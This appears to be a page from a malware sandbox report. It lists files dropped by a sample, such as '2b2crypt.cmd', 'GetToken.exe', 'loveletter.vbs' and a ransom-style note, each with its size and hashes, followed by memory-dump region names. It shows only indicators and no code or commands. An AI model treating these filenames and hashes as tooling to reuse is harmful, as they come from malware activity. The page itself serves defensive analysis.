93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
e8528a3cdf5bc45593ad1982ff7385af

SHA1
a24420980496cd0681aef662abebb2ae3acd02a1

SHA256
1de63662c8c6b22e221ab985b94c1c9c2dd015b68d242c0914300c0108acfd6a

SHA512
afefaa3be56974b017b7245b36743db893cc37cfa61023cef0cfa0c39c6f160df3ed70e7c35232f6f9fa8a1b9e461be43f98828d1b3e6e7c088d5dde62ef7851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
e8528a3cdf5bc45593ad1982ff7385af

SHA1
a24420980496cd0681aef662abebb2ae3acd02a1

SHA256
1de63662c8c6b22e221ab985b94c1c9c2dd015b68d242c0914300c0108acfd6a

SHA512
afefaa3be56974b017b7245b36743db893cc37cfa61023cef0cfa0c39c6f160df3ed70e7c35232f6f9fa8a1b9e461be43f98828d1b3e6e7c088d5dde62ef7851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
24c13d5530c176b565619683e21ea2e7

SHA1
d65f5d8481f8b2f53ee1295f8fb06c9170914171

SHA256
7282f4459a68e55266453fc018a89377d3420baa44977f528b66eee029df84d6

SHA512
12e079e0fbab640904e9dbf746785a7824656186c26930ece5d9fb1894935feb691705145e3b3d2480a84bab2a6b99a14c735d146a747074015477c5091ffb41

Download Submit
C:\Users\Admin\Desktop\YcynNote.txt
Filesize
467B

MD5
4229508619c5ea6b34d057303772f429

SHA1
f2531bb1614ce410f51966495be5573fd22bb84b

SHA256
4fb248ef44308e95e7f61753b014f32c00305d9b1385b1c0202e144f56718fdd

SHA512
0f8bb8e41ad99e73160eb74264f914f23b1e0913695f6215cc370eac009dc5105875509d33f0a9ce1d0f46faa1c8f2cc5dac580046c88e5ce6d51dd3a369a070

Download Submit
C:\Users\Admin\Documents\black.bat
Filesize
71B

MD5
3544e4b7ac1418d34061648a9f3e3dc6

SHA1
30e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce

SHA256
db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8

SHA512
5d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126

Download Submit
C:\Users\Admin\Downloads\2b2crypt.cmd
Filesize
133B

MD5
c097b3cb4416afcd2c04e0d807379787

SHA1
effaaaaa9df2d18552f7db74d5bde56af3d7a960

SHA256
d4dc1ae3a58123e250799b85de97a7cf82909bd2051b66cb4cc32a5548b19a38

SHA512
3381746f63f28eba3da1178767c74a111608c737f9041c5f5cc8eddd63b71d7a087e7cd2a10bbb98a922b43ec3248dc7025bcc97677f58bd67876c849936e587

Download Submit
C:\Users\Admin\Downloads\2b2crypt.m.cmd
Filesize
138B

MD5
8ff9edfa72d56770ccab74db8ecc31a9

SHA1
03973d0920f6ea842ddd257b31488e9bd4387ccd

SHA256
218315485bc66b964d3ea6d839a059f038b9ace51e37e120d88c6737a7cebf2b

SHA512
ba374d3232872d72bdfadc1d5c67e3e72fa41d7a7380c86ad9c601e04c553065cc1d6ac28881b2315bdf721f31a60473f0e14d897594c99aef2b99fd9988f287

Download Submit
C:\Users\Admin\FuckPorts.cmd
Filesize
359B

MD5
0f99905ef600c2ebf651c94402cc6b33

SHA1
782dd68f8d79245156af45fe5f69e3a6d7a45dd1

SHA256
e2b000fb67f7b0f80918c5f664946cd83cb33adbe2a8ae36e31bd34f3340525c

SHA512
40755fc6e47257fa41f44978ebd4986ef2d15e6ed32ea298a35970432f829d67d0637d3005d9e09f5403b17abcf55e4966df7e81a239a6dd58a8a55b81e5a354

Download Submit
C:\Users\Admin\GetToken.exe
Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\GetToken.exe
Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\loveletter.vbs
Filesize
495B

MD5
900ead69492d80e48738921eca28b14f

SHA1
6b51607c54f8e734a7ea47091859c3e8dce6365c

SHA256
c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3

SHA512
8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

Download Submit
C:\Users\Admin\mail.vbs
Filesize
488B

MD5
88ef4bc3f48eeb97aedadff8f3840980

SHA1
48e8167bef2562d902885a075f6190d269fd3d35

SHA256
b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa

SHA512
523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024

Download Submit
C:\Users\Admin\ycynlog.cmd
Filesize
51KB

MD5
4af79fa246608df60c78e02c1670f084

SHA1
0441d4e69225c12656c3855e24a2702d8737a227

SHA256
298c325bbc80af8b3ac77365dd7cc3f97000a8377f36937d8563ab743a92b21c

SHA512
5cc0cf9575c5688a8c1aaa966da1a2f49737dc6fe24f98437472c42f1ab48cd8277f9724f7bc0361dc57a4e4d31e2fe9cdbf417b75a6eb9a81fd61bcaa65ff8f

Download Submit
memory/112-145-0x0000000000000000-mapping.dmp

Download
memory/636-138-0x000001F7EA370000-0x000001F7EA392000-memory.dmp

Filesize
136KB

Download
memory/636-137-0x0000000000000000-mapping.dmp

Download
memory/636-139-0x00007FFB62E30000-0x00007FFB638F1000-memory.dmp

Filesize
10.8MB

Download
memory/648-221-0x0000000000B80000-0x0000000000B88000-memory.dmp

Filesize
32KB

Download
memory/764-155-0x0000000000000000-mapping.dmp

Download
memory/952-196-0x0000000000000000-mapping.dmp

Download
memory/1100-167-0x0000000000000000-mapping.dmp

Download
memory/1144-130-0x0000000000000000-mapping.dmp

Download
memory/1144-192-0x0000000000000000-mapping.dmp

Download
memory/1248-189-0x0000000000000000-mapping.dmp

Download
memory/1368-163-0x0000000000000000-mapping.dmp

Download
memory/1436-156-0x0000000000000000-mapping.dmp

Download
memory/1440-157-0x0000000000000000-mapping.dmp

Download
memory/1480-133-0x0000000000000000-mapping.dmp

Download
memory/1580-177-0x0000000000000000-mapping.dmp

Download
memory/1588-143-0x0000000000000000-mapping.dmp

Download
memory/1732-132-0x0000000000000000-mapping.dmp

Download
memory/1812-151-0x0000000000000000-mapping.dmp

Download
memory/1892-179-0x0000000000000000-mapping.dmp

Download
memory/1932-181-0x0000000000000000-mapping.dmp

Download
memory/1960-142-0x0000000000000000-mapping.dmp

Download
memory/2020-195-0x0000000000000000-mapping.dmp

Download
memory/2104-159-0x0000000000000000-mapping.dmp

Download
memory/2124-193-0x0000000000000000-mapping.dmp

Download
memory/2156-191-0x0000000000000000-mapping.dmp

Download
memory/2212-188-0x0000000000000000-mapping.dmp

Download
memory/2216-158-0x0000000000000000-mapping.dmp

Download
memory/2216-211-0x00007FFB62590000-0x00007FFB63051000-memory.dmp

Filesize
10.8MB

Download
memory/2220-180-0x0000000000000000-mapping.dmp

Download
memory/2284-147-0x0000000000000000-mapping.dmp

Download
memory/2488-176-0x0000000000000000-mapping.dmp

Download
memory/2584-161-0x0000000000000000-mapping.dmp

Download
memory/2880-175-0x0000000000000000-mapping.dmp

Download
memory/2924-162-0x0000000000000000-mapping.dmp

Download
memory/3024-214-0x00007FFB61B10000-0x00007FFB625D1000-memory.dmp

Filesize
10.8MB

Download
memory/3048-201-0x00007FFB62590000-0x00007FFB63051000-memory.dmp

Filesize
10.8MB

Download
memory/3120-178-0x0000000000000000-mapping.dmp

Download
memory/3224-190-0x0000000000000000-mapping.dmp

Download
memory/3324-140-0x0000000000000000-mapping.dmp

Download
memory/3348-164-0x0000000000000000-mapping.dmp

Download
memory/3368-187-0x0000000000000000-mapping.dmp

Download
memory/3436-210-0x00007FFB62590000-0x00007FFB63051000-memory.dmp

Filesize
10.8MB

Download
memory/3496-154-0x0000000000000000-mapping.dmp

Download
memory/3556-217-0x00007FFB61B10000-0x00007FFB625D1000-memory.dmp

Filesize
10.8MB

Download
memory/3656-149-0x0000000000000000-mapping.dmp

Download
memory/3676-209-0x00007FFB62590000-0x00007FFB63051000-memory.dmp

Filesize
10.8MB

Download
memory/3712-185-0x0000000000000000-mapping.dmp

Download
memory/3732-152-0x0000000000000000-mapping.dmp

Download
memory/3764-144-0x0000000000000000-mapping.dmp

Download
memory/3780-168-0x0000000000000000-mapping.dmp

Download
memory/3840-172-0x0000000000000000-mapping.dmp

Download
memory/3848-165-0x0000000000000000-mapping.dmp

Download
memory/3988-166-0x0000000000000000-mapping.dmp

Download
memory/3996-186-0x0000000000000000-mapping.dmp

Download
memory/4000-146-0x0000000000000000-mapping.dmp

Download
memory/4052-160-0x0000000000000000-mapping.dmp

Download
memory/4140-171-0x0000000000000000-mapping.dmp

Download
memory/4228-173-0x0000000000000000-mapping.dmp

Download
memory/4272-182-0x0000000000000000-mapping.dmp

Download
memory/4304-174-0x0000000000000000-mapping.dmp

Download
memory/4324-184-0x0000000000000000-mapping.dmp

Download
memory/4396-170-0x0000000000000000-mapping.dmp

Download
memory/4448-194-0x0000000000000000-mapping.dmp

Download
memory/4516-183-0x0000000000000000-mapping.dmp

Download
memory/4708-169-0x0000000000000000-mapping.dmp

Download
memory/4784-150-0x0000000000000000-mapping.dmp

Download
memory/4796-136-0x0000000000000000-mapping.dmp

Download
memory/4808-153-0x0000000000000000-mapping.dmp

Download
memory/4832-135-0x0000000000000000-mapping.dmp

Download
memory/4960-208-0x00007FFB62590000-0x00007FFB63051000-memory.dmp

Filesize
10.8MB

Download
memory/4980-141-0x0000000000000000-mapping.dmp

Download
memory/5004-134-0x0000000000000000-mapping.dmp

Download
memory/5060-131-0x0000000000000000-mapping.dmp

Download